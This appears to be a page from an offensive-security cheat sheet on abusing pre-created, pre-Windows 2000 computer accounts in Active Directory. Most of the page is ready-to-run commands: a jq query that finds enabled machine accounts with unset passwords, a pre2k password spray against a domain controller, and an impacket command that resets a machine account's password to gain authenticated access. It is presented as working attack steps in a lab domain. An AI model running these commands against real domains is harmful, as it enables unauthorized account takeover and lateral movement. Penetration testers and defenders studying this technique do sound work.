Pre-created Computers Abuse

Pre-created Computer Accounts & Pre-Windows 2000

ACL Abuse on Pre-Windows 2000 Computers

Search for machines that never updated their passwords:

$ cat 19700101000000_computers.json | jq '.data[].Properties | select(.enabled == true and .pwdlastset == 0) | .name' -r > pre2k.txt

Initiate a pitchfork spray against them:

$ pre2k unauth -d megacorp.local -dc-ip 192.168.1.11 -inputfile pre2k.txt -sleep 10 -jitter 30 -threads 1

Change password to authenticate via NTLM:

$ changepasswd.py megacorp.local/'PC01$:pc01'@192.168.1.11 -newpass 'Passw0rd!' -protocol kpasswd -dc-ip 192.168.1.11

Last updated 12 days ago